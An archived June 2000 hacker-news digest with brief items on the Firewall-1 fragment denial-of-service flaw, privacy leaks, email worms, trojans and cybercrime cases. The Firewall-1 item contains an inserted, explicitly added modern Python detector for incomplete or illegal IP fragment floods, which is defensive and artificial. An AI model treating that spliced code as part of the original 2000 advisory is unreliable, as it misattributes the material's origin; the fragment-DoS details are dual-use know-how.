~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Lance
An advisory posted to BugTraq this morning indicated that every Firewall-1 installation may be susceptible to a DoS attack from incomplete or illegal packet fragments. Since FW-1 waits until it has a complete packet before it inspects or logs the information, filter rules will not help.
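The FW-1 item above rests on one point: a filter that only inspects or logs a datagram once every fragment has arrived never sees a fragment train that is deliberately left incomplete, so the rule base cannot catch the flood. What a defender can do is watch the reassembly table itself. The following is an added example, written for this issue and not code from Check Point, BugTraq or the original advisory; it keeps a small reassembly table over a constructed fragment feed, expires trains that never complete, flags non-final fragments whose length is not a multiple of 8 (which the IP specification forbids), and reports sources that leave more than a threshold of datagrams unfinished. The record layout, the timeout and the threshold are all assumptions for the example.

```python
"""Spot floods of incomplete or illegal IP fragment trains in a packet feed.

Added example for the FW-1 fragment DoS item; not Check Point's or the
advisory's code. Record format, timeout and threshold are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

REASSEMBLY_TIMEOUT = 30.0  # seconds a partial datagram may wait (assumed value)
ALERT_THRESHOLD = 5        # expired datagrams per source that trigger an alert (assumed)


@dataclass
class Fragment:
    ts: float     # arrival time in seconds
    src: str      # source IP address
    ip_id: int    # IP identification field shared by every piece of one datagram
    offset: int   # byte offset of this piece within the original datagram
    length: int   # payload bytes carried by this piece
    more: bool    # MF flag: set on every piece except the last one


@dataclass
class Pending:
    """One partially reassembled datagram, keyed by (src, ip_id)."""
    first_seen: float
    got_last: bool = False
    pieces: List[Tuple[int, int]] = field(default_factory=list)

    def add(self, frag: Fragment) -> None:
        self.pieces.append((frag.offset, frag.offset + frag.length))
        if not frag.more:
            self.got_last = True

    def complete(self) -> bool:
        """True once the last piece is here and the byte ranges cover 0..end with no gap."""
        if not self.got_last:
            return False
        end = 0
        for start, stop in sorted(self.pieces):
            if start > end:
                return False
            end = max(end, stop)
        return True


@dataclass
class Report:
    completed: int = 0
    illegal: Dict[str, int] = field(default_factory=lambda: defaultdict(int))
    expired: Dict[str, int] = field(default_factory=lambda: defaultdict(int))

    def alerts(self) -> List[str]:
        """Sources that left at least ALERT_THRESHOLD datagrams unfinished."""
        return sorted(src for src, n in self.expired.items() if n >= ALERT_THRESHOLD)


def analyse(fragments: List[Fragment]) -> Report:
    """Run the feed through a reassembly table and account for what never completed."""
    table: Dict[Tuple[str, int], Pending] = {}
    report = Report()

    def expire(now: float) -> None:
        stale = [k for k, p in table.items() if now - p.first_seen > REASSEMBLY_TIMEOUT]
        for key in stale:
            report.expired[key[0]] += 1   # charge the incomplete train to its source
            del table[key]

    for frag in sorted(fragments, key=lambda f: f.ts):
        expire(frag.ts)
        # Every non-final fragment must carry a multiple of 8 bytes; anything else is illegal.
        if frag.more and frag.length % 8 != 0:
            report.illegal[frag.src] += 1
            continue
        key = (frag.src, frag.ip_id)
        pending = table.setdefault(key, Pending(first_seen=frag.ts))
        pending.add(frag)
        if pending.complete():
            report.completed += 1
            del table[key]

    if fragments:   # final sweep: whatever is still waiting has timed out
        expire(max(f.ts for f in fragments) + REASSEMBLY_TIMEOUT + 1)
    return report


def sample_feed() -> List[Fragment]:
    """Constructed traffic: two legitimate trains, one flood source, one illegal piece."""
    feed: List[Fragment] = []
    for n, ip_id in enumerate((100, 101)):
        t = 1.0 + n
        feed += [Fragment(t, "10.0.0.5", ip_id, 0, 1480, True),
                 Fragment(t + 0.01, "10.0.0.5", ip_id, 1480, 1480, True),
                 Fragment(t + 0.02, "10.0.0.5", ip_id, 2960, 500, False)]
    for i in range(8):   # only the first piece of each datagram is ever sent
        feed.append(Fragment(5.0 + i * 0.1, "192.0.2.7", 5000 + i, 0, 1480, True))
    feed.append(Fragment(20.0, "198.51.100.9", 77, 0, 100, True))  # 100 is not a multiple of 8
    return feed


if __name__ == "__main__":
    r = analyse(sample_feed())
    print("completed:", r.completed, "expired:", dict(r.expired), "illegal:", dict(r.illegal))
    print("alert sources:", r.alerts())
```

Run on the constructed feed, the two trains from 10.0.0.5 complete immediately, the eight single-fragment trains from 192.0.2.7 sit in the table until the timeout sweeps them out and that source is reported, and the 100-byte non-final piece is rejected before it ever occupies a table slot. The same per-source accounting is what a firewall or IDS would have to do below the rule base, because by the time a rule could match the datagram, the resource cost of holding the fragments has already been paid.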
Checkpoint has reportedly developed a short term solution (We could not find it on their web site this morning) and are working on a long term fix to be rolled out in a later service pack. BugTraq - via Security Focus Checkpoint http://www.securityfocus.com/templates/archive.pike?list http://www.checkpoint.com @HWA 121.0 [HNN] June 05'00 Australian Tax Office Sells Private Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by tall.drink Privacy Commissioner, Mr Malcolm Crompton, has stated that the Australian Taxation Office had broken privacy laws by releasing personal information supplied by individual applicants for an Australian Business Number. The ABN application form states that the name, address, e-mail address, phone number, etc of applicants will remain 'confidential' It dies not say that anyone can purchase this information for $20, a clear violation of Australia's Privacy Act. The Tax Office will develop guidelines to prevent this from occurring in the future. (I guess we can all rest easy now.) Sydney Morning Herald http://www.smh.com.au/news/0006/06/national/national5.html @HWA 122.0 [HNN] June 05'00 British Have Lost Dozens of Laptops ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Britain's Ministry of Defense has revealed that since May of 1997 it has had 59 laptops stolen and 8 'lost' by staff members. The numbers where revealed in a written explanation to the House of Commons yesterday. (How do you loose a laptop?) Associated Press - via Nando Times http://www.techserver.com/noframes/story/0,2294,500212323-500298954-50 1646000-0,00.html @HWA 123.0 [HNN] June 05'00 S.2448 Analysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench An analysis of S.2448 the Internet Integrity and Critical Infrastructure Protection Act of 2000 has been posted to Cipherwar. The analysis looks at each provision of the bill and what it means. 
The bill was introduced in April and has been referred to the Committee on the Judiciary.

Cipherwar
S.2448 - Senate.gov
http://cipherwar.com/news/00/s2448_hacking.htm
http://rs9.loc.gov/cgi-bin/query/D?c106:3:./temp/~c10690I7Wg::

@HWA

124.0 [HNN] June 05'00 Spammer Busted For Online Tampering
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

Jason Garon, 46, of Mission Viejo, CA, has been arraigned on charges of forgery and computer tampering after using the computer systems of Max Vision, a New York state company, to send millions of email advertisements for porn sites. If convicted he could be sentenced to up to seven years in prison. The District Attorney said that this is the first case involving online forgery in the country.

Associated Press - via C|Net
http://news.cnet.com/news/0-1005-200-2024887.html?tag

@HWA

125.0 [HNN] June 05'00 Cell Phone Viruses?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

Next generation cell phones that include programmability and internet access may become susceptible to new forms of viruses. These new viruses may reroute phone calls, record conversations, rack up huge phone bills, as well as delete data and cause general mayhem. (In reality this isn't all that far fetched, but this article is just full of FUD.)

Fox News
http://www.foxnews.com/vtech/060100/cellvirus.sml

@HWA

126.0 [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Lady Sharrow

Users of the Spanish cell phone company Telefonica are being hit by the Timofonica Worm. While Timofonica does not infect cell phones directly, it does send annoying email messages to users. The worm is spread through conventional email and includes a rant against the state owned Telefonica monopoly. When users open the .vbs attachment it sends an email to an email-GSM gateway with a random user ID, where the message is then sent to cell phones.
The Register UK
ZD Net
MSNBC
Internet News
Reuters - via Yahoo
Associated Press - via Nando Times
http://www.theregister.co.uk
http://www.zdnet.com/zdnn/stories/news/0,4586,2583104,00.html
http://www.msnbc.com/news/417066.asp?cp1
http://www.internetnews.com/intl-news/article/0,2171,6_388331,00.html
http://dailynews.yahoo.com/h/nm/20000606/tc/virus_phone_dc_1.html
http://www.nandotimes.com/technology/story/body/0,1634,500212951-500300231-501656210-0,00.html

@HWA

127.0 [HNN] June 07'00 MafiaBoy to Get New Charges
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

Mafiaboy was arrested for DDoS attacks on high-profile Internet sites back in February but has only been charged with the attack on CNN. Canada's crown prosecutor Louis Miville-Deschenes will now bring additional charges of the same type but for attacks against different sites.

Agence France Press - via Nando Times
http://www.nandotimes.com/technology/story/0,1643,500212784-500299842-501653573-0,00.html

@HWA

128.0 [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Boyd

Checkpoint has posted an interim work around for the IP fragment-driven denial of service attack announced yesterday. The work around involves a command line instruction that will disable console logging.

Checkpoint FW-1 Fix
BugTraq - original advisory
http://www.checkpoint.com/techsupport/alerts/ipfrag_dos.html
http://www.securityfocus.com/templates/archive.pike?list

@HWA

129.0 [HNN] June 07'00 Air Force Blocks Access to Museum Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by no0ne

Soldiers of Peterson Air Force Base in Colorado are not allowed to access the web site of the San Francisco based science museum Exploratorium. The reason, according to museum officials, is that they have the recipe for the "bubble bomb" up on their site.
Bubble bomb is an experiment in which vinegar and baking soda are mixed in a plastic bag; a chemical reaction takes place, in turn causing the bag to explode. (Kids in grade schools do this for science class, right?)

Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/breaking/docs/016603.htm

@HWA

130.0 [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Brian

Years of deep budget cuts have left the Canadian Mounties far behind the criminals when dealing with online crime. Officials hope that the recent approval of $543-million in new funds will help narrow that gap. The RCMP has lost several good officers to the private sector recently but hopes to train 1,200 to 1,300 new Mounties this year.

National Post
http://www.nationalpost.com/financialpost.asp?f

@HWA

131.0 [HNN] June 08'00 Accused in ILOVEYOU virus case set free
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by weld pond

The 27 year old bank employee, Reonel Ramones, suspected in the "Love Bug" virus case has been freed because there is no law in the Philippines under which he could be prosecuted. He did nothing illegal.

CNN
San Jose Mercury News
http://cnnfn.com/2000/06/07/worldbiz/wires/love_wg/
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/020797.htm

@HWA

132.0 [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by silicosis

Kevin Mitnick and a range of people from the computer underground are interviewed about working in the computer security industry.
CIO Magazine
http://www.cio.com/archive/060100_con.html

@HWA

133.0 [HNN] June 08'00 Australia passes law legalizing government computer intrusions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by apocolypse

The Telecommunications (Interception) Legislation Amendment Bill 1999 was passed through the Australian Parliament. The new bill aims to aid law enforcement officers investigating criminal activities and intelligence collection by the Australian Security Intelligence Organization. This latest bill adds to legislation passed last year that gave ASIO, Australia's internal security service, the right to hack into any Australian's computer.

Newsbytes
http://www.newsbytes.com/pubNews/00/150247.html

@HWA

134.0 [HNN] June 08'00 Press allowed to cover MPAA depositions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by apocolype

The Motion Picture Association of America (MPAA) loses its bid to stop public scrutiny of proceedings in a lawsuit targeting an online distributor of freely available DVD-cracking technology. Yesterday's ruling marked a victory for freedom of expression and society's access to its courts, Robin Gross, an attorney with the Electronic Frontier Foundation (EFF), said today. The San Francisco-based civil liberties group is backing the defense of 2600 Magazine and is representing defendants in a similar case in California.

Newsbytes
Ruling via Cryptome
2600
http://www.newsbytes.com/pubNews/00/150243.html
http://cryptome.org/mpaa-v-2600-spo.htm
http://www.2600.com/news/2000/0608.html

@HWA

135.0 [HNN] June 08'00 Vulnerability in free mail services found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by apocolype

Lycos' WhoWhere fixes a problem affecting millions of email accounts that allowed intruders to peruse email and send messages as though the accounts were their own.
Lycos would not say how many people have registered for the company's MailCity service, nor would they estimate how many other accounts may have been at risk or how long the bug might have existed.

CNET
http://news.cnet.com/news/0-1005-200-2036086.html?tag

@HWA

136.0 [HNN] June 08'00 OnStar service can unlock car doors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by evenprime

The OnStar system allows OnStar to call into your car and control your door locks, the horn, and the lights. Very secure and very proprietary systems protect your OnStar system from being abused by attackers.

Risk Digest
http://catless.ncl.ac.uk/Risks/20.90.html#subj2

@HWA

137.0 [HNN] June 09'00 Thousands of trojaned computers found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by weld pond

The Justice Department has been notified that thousands of computers have been found with trojan remote control software installed. A file which looked like a movie clip actually contained remote control software which has been dubbed the "Serbian Badman Trojan".

AP
http://news.excite.com/news/ap/000609/02/hacker-attack

@HWA

138.0 [HNN] June 09'00 Investigative Report: Female Hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by weld pond

ABC News investigates the female side of the hacker subculture. This largely male dominated world presents special challenges to women. Scene whores, hacker hangouts, and the non-sexist elite are covered.

ABC News
http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html

@HWA

139.0 [HNN] June 09'00 ISS founder is a white hat hacker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

LinuxWorld profiles Christopher Klaus, the founder of ISS. The origins of his company and products are discussed as well as their current classes in Linux security.
LinuxWorld
http://www.linuxworld.com/linuxworld/lw-2000-06/f_lw-06-iss.html

@HWA

140.0 [HNN] June 09'00 80,000 DNS Domain Server Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

80,000 domains make up about 75 percent of the domain name system (DNS) in Australia and New Zealand. These DNS servers are vulnerable to Denial-of-Service attacks, and 55 percent may be compromised at the root level. One security threat for vulnerable DNS systems is that a hijacker could point a site's DNS to a proxy server, capture important information, then send data back to the genuine server with the interception unnoticed.

ZDNET
http://www.zdnet.com.au/enterprise/security/stories/au0003277.html

@HWA

141.0 [HNN] June 09'00 Lewis Koch on Winn Schwartau
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by mcintyre

Lewis Koch has an opinion piece about Winn Schwartau. This quote says it all: "It's not that hackers present no real danger. In fact, we need a sober analyst of Internet reality, someone who can identify who is doing real damage and how that damage can legitimately be monitored and contained. But Schwartau, peddling his Cybershock warning of a virtual doomsday, is just another hysterical infowarrior playing to our primal burrowing instincts."

Interactive Week
http://www.zdnet.com/intweek/stories/columns/0,4164,2584807,00.html

@HWA

142.0 [HNN] June 09'00 Television takes on computer crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by PhantasmP and Weld Pond

There are 2 upcoming shows on TV relating to computer security. The first is on A&E Network's respected Investigative Reports. The show is titled "e-terror" and airs Wed, June 14 at 10pm. The show will be an in-depth look at security on the internet. People from NIPC, the military, and the L0pht will be interviewed.

Investigative Reports

This Saturday (May 13th) America's Most Wanted is airing an episode about cyber terrorism.
The write up in the print edition of TV Guide is as follows: "Examining U.S. government efforts to stop criminal computer hackers, who can disrupt vital city services." The online edition says "Cyber-Criminals Special Edition: An overview of cyber terrorism includes easy targets; wide-ranging effects; and a profile of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX Networks.

America's Most Wanted
http://www.aande.com/tv/shows/billkurtis/irhighlights.html#e-terror
http://www.amw.com/

@HWA

143.0 [HNN] June 09'00 Top 50 Security Tools Survey
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by weld pond

1200 nmap users were surveyed about their favorite security tools. Open source tools ruled the day. The survey includes descriptions and pointers to the distribution sites.

Fyodor's Good Reading List
http://www.insecure.org/tools.html

@HWA

144.0 [HNN] June 12'00 NETSEC Discovers Nothing New
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Frank

Last Friday's announcement by NETSEC (Network Security Technologies) of a new DDOS tool installed on thousands of computers world wide created a lot of media attention but was really nothing new. The so called 'Serbian Badman Trojan' is nothing more than a repackaged version of Sub7, a remote administration tool similar to NetBus that has been around for years. Sub7 is incapable of launching a DDoS attack in its current revision. NETSEC's discovery amounts to nothing more than a publicity stunt by an opportunistic security firm in quest of free advertising in the form of media attention.

The UK Register
ZD Net
Symantec
Network Associates
Commandcom

Late Update: 120412JUN00 NetSec has sent us an email explaining their position.
NetSec Response
http://www.theregister.co.uk/content/1/11290.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2585554,00.html?chkpt
http://www.symantec.com/avcenter/venc/data/serbian.trojan.html
http://vil.nai.com/villib/dispvirus.asp?virus_k
http://www.commandcom.com/virus/downtroj.html

@HWA

145.0 [HNN] June 12'00 Brazilian Telephone Users Privacy Breached
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by i_l00p

The personal data of millions of customers of the Brazilian telephone monopoly Telephonica can be purchased on the street for R$10. The CD contains name, address, phone number (including unlisted numbers), and CPF number (which is similar to a social security number). Telephonica has admitted that they have known that the information was available since June of last year.

Estado - Portuguese
http://www.estado.com.br/editorias/2000/06/02/cid690.html

@HWA

146.0 [HNN] June 12'00 Dozens of Malaysian Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by mortel

Attackers have broken into dozens of Malaysian political Websites, leaving government officials and opposition leaders fuming Sunday over images of rotting skulls and obscene messages. One vandal, calling himself "Xenophoria", attacked 21 pro-government Websites, posting a list of demands for greater press freedom and an end to corruption.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000611/tc/malaysia_cyber_havoc_1.html

@HWA

147.0 [HNN] June 12'00 Return of FidNet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Diane

The General Services Administration has released a draft request for proposals on the Federal Intrusion Detection Network. It is hoped that FidNet will enable civilian agencies to react collectively to cyber attacks. The draft RFP will allow vendors to determine what they can offer now and in the future.
Federal Computer Week
FedCIRC - RFP
FidNet
http://www.fcw.com/fcw/articles/2000/0605/web-fidnet-06-08-00.asp
http://www.fedcirc.gov/fidnet/SECTION%20DRFP.pdf
http://www.fedcirc.gov/fidnet/

@HWA

148.0 [HNN] June 12'00 H2K Update: Movie Premier, Speaker List
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Macki

Freedom Downtime, the 2600 documentary about the Free Kevin campaign, is nearing completion and will premiere at H2K Friday evening (July 14). A preliminary list of speakers and panels is now available. Preregistration for the conference closes this coming Friday, 6/16/00.

Hope 2000
http://www.h2k.net/

@HWA

149.0 [HNN] June 12'00 Another ILOVEYOU Variant Found
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

Just another copycat of the ILOVEYOU worm, it's called Plan Columbia (aka Loveletter.AS). Most anti-virus software will detect it as part of the ILOVEYOU family and remove it. The subject line will read: US PRESIDENT AND FBI SECRETS =PLEASE VISIT = (http://WWW.SHUNSV.COM) = a random sequence of 6 uppercase letters.

ZD Net
(http://WWW.SHUNSV.COM)
http://www.zdnet.com/zdhelp/stories/main/0,5594,2583071,00.html

@HWA

150.0 [HNN] June 12'00 Radio Interferer Gets Five Years
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

Jack Gerritsen has pleaded guilty to charges of broadcasting over 1,000 obscene messages on police frequencies in the Los Angeles area. Mr. Gerritsen has been sentenced to five years in jail for his crimes. (The press labeled this guy a hacker. Yeah, it takes a lot of skill to push a button and say obscene things.)
Associated Press - via Union Tribune
http://www.uniontribune.com/news/state/20000610-991447-radiohacker.html

@HWA

151.0 [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

An Indonesian youth has been arrested while studying in Australia for breaking into a Singaporean company. A server at Data Storage Institute, a Singapore research and development center, was attacked in March while the student was studying in Australia. The case was handled by the Computer Crime Branch of the police department.

Fairfax IT
http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html

@HWA

152.0 [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by martin

About a year ago HNN published a story about a man who was convicted in England for using a cell phone on board a plane. HNN felt the law was less about public safety and more about airline royalties on in flight phone use. Finally there is some actual scientific evidence that illustrates the dangers of cell phone use while in flight. The study was conducted by Britain's Civil Aviation Authority, who obviously has a vested interest in the outcome of the results. While this is definitely a step in the right direction, more studies are needed.

HNN Archive for July 23, 1999
New Scientist
http://www.hackernews.com/arch.html?072399
http://www.newscientist.com/nsplus/insight/phones/dangersignals.html

@HWA

153.0 [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

The US Energy Department has disclosed that two hard drives containing very sensitive nuclear information have come up missing from a high security vault at the Los Alamos National Laboratory.
Officials have theorized that the disappearance may be related to last month's forest fires, which caused an evacuation. Officials also commented that it was doubtful that espionage was involved. The two hard drives contain detailed information on how to disable nuclear weapons in the event of an emergency.

C|Net
MSNBC
http://news.cnet.com/news/0-1003-200-2066575.html?tag
http://www.msnbc.com/news/419700.asp

@HWA

154.0 [HNN] June 13'00 Police Stumble onto Pirates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

Seeking to recover stolen laptop computers, state troopers in Pennsylvania recovered much more: $22 million worth of pirated Microsoft software and phony license agreements. Police collected more than 8,000 copies of Windows 98, Microsoft Office and Windows NT at the location, and over 25,000 counterfeit end-user license agreements.

Wired
http://www.wired.com/news/business/0,1367,36944,00.html

@HWA

155.0 [HNN] June 13'00 Social Aspects of the Love Bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

The recent ILOVEYOU virus/worm was not unique, but due to its far reaching implications and media coverage it makes an excellent example to pick apart antivirus companies, the government's preventive measures, cyber detectives, and the guesswork involved in estimating billion-dollar damages.

Sun World
http://www.sunworld.com/sunworldonline/swol-06-2000/swol-06-lovebug.html

@HWA

156.0 [HNN] June 13'00 Interview with Bruce Schneier
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Rich

Noted cryptographer Bruce Schneier answers a few questions for Information Security magazine about cryptography, managed security services and just security in general.
Information Security Magazine
http://www.infosecuritymag.com/jun2000/junqa.htm

@HWA

157.0 [HNN] June 13'00 IC-Crypt 128 Goes Freeware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Tom

Now available as freeware, IC-Crypt offers 128-bit encryption for ICQ users. The author has decided to make the reg code generator available for all.

IC-Crypt
http://www.ic-crypt.org.uk

@HWA

158.0 [HNN] June 13'00 IronBox Releases New Articles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by White Vampire

Iron Box Technologies, a conglomeration of several high profile underground sites, has released several new articles: Sorting and Searching Algorithms Part 1 and 2, A Brief History Of Hacking, and A Different Language Across the Border, which recommends using bilingual servers as an additional security measure.

Iron Box Technologies
http://www.ironboxtech.com/articles

@HWA

159.0 [HNN] June 13'00 Hong Kong Government Defaced, Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

A vandal or vandals defaced a Hong Kong government Web site Sunday, forcing officials to close the site down for the second time in less than 24 hours. The government decided to temporarily shut down the Interactive Government Services Directory Web site to finally solve the problems. The attack on Sunday followed the attack on Saturday, which forced administrators to take the site off line for 10 hours. The police are investigating.

Agence France-Presse - via Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500214563-500303437-501680312-0,00.html

@HWA

160.0 [HNN] June 14'00 RootFest Opens Today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

The Midwest's largest computer security convention opens today in St. Paul's RiverCentre. RootFest organizers estimate that as many as 1000 people may attend RootFest this year. It is hoped that the con will be broadcast in both audio and video in real time over the net.
RootFest
Saint Paul Pioneer Press
http://www.rootfest.org/
http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm

@HWA

161.0 [HNN] June 14'00 Email Hoax Panics Credit Card Holders
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by root66

Customers of Future Shop received an ominous message claiming that FutureShop customer records had been compromised and that all credit card numbers had been lost. Fortunately this was not true. FutureShop outsources its mass mailings, and someone at that unnamed company sent the false email. It is unknown if the perpetrator was an employee or someone who broke into the other company. Officials are investigating. (This really highlights the need for security between business partners. It is not enough to wall off your own little section of the net if you want to be secure and get work done.)

NW Fusion
http://www.nwfusion.com/news/2000/0612emailhoax.html?nf

@HWA

162.0 [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

Thousands of outside contractors, many of them foreign nationals, have been allowed access to the Federal Aviation Administration's critical computer systems without having to undergo background checks. While the FAA is taking steps to address the gaping security hole, the agency is saddled with a backlog of security checks that it doesn't expect to complete for several months.

NewsBytes
http://www.newsbytes.com/pubNews/00/150560.html

@HWA

163.0 [HNN] June 14'00 @stake Announces Technical Advisory Board
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Space Rogue

@stake has announced the formation of their Technical Advisory Board, which comprises world-renowned leaders in Internet security from the private, public and academic spheres, including Counterpane, Intel, MIT and UUNet.
Strengthening @Stake's already formidable Research and Development staff, the members of the Technical Advisory Board include: Edward Appel, Ernie Brickell, Dorothy Denning, Tsvi Gal, Scott Loftesness, Michael D. O'Dell, Jeffrey I. Schiller, and Bruce Schneier.

Business Wire
http://www.businesswire.com/webbox/bw.061300/201650341.htm

@HWA

164.0 [HNN] June 14'00 Site Forced to Hand Over User Identities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

Financial information Web site Interactive Investor was forced to hand over the names and IP addresses of contributors to its bulletin boards Sunday after receiving a court order obtained by Scoot.com. Scoot alleges the bulletin boards contained defamatory material. Civil liberties advocates have warned that the decision to force a Web site to reveal the identity of bulletin board contributors could stifle Internet free speech in Britain.

ZD Net UK
http://www.zdnet.co.uk/news/2000/23/ns-15965.html

@HWA

165.0 [HNN] June 14'00 ITN Email Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by no0ne

Thousands of people on the ITN Desktop news email distribution list received an unauthorized email that said "We are one step closer to finding you, you little f***er." Eighteen hours later ITN sent out an email apologizing for the security breach.

The Register UK
http://www.theregister.co.uk/content/1/11324.html

@HWA

166.0 [HNN] June 15'00 Philippine President Signs Computer Crime Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by punkis

The ILOVEYOU virus/worm demonstrated the Philippines' lack of legal remedies for computer crimes. Now the Philippine President has signed into law an electronic commerce bill that will hopefully fill this gap. The law will punish virus spreaders with a minimum fine of $2,350 up to a maximum commensurate with the damage caused, and they can receive a jail sentence of up to three years.
The Philippines have now joined Malaysia, Singapore and South Korea as countries that have specific computer crime laws on the books.

Associated Press - via Boston Globe
http://www.boston.com/dailynews/166/economy/Philippine_president_signs_law:.shtml

@HWA

167.0 [HNN] June 15'00 MPAA vs 2600 Transcripts Released
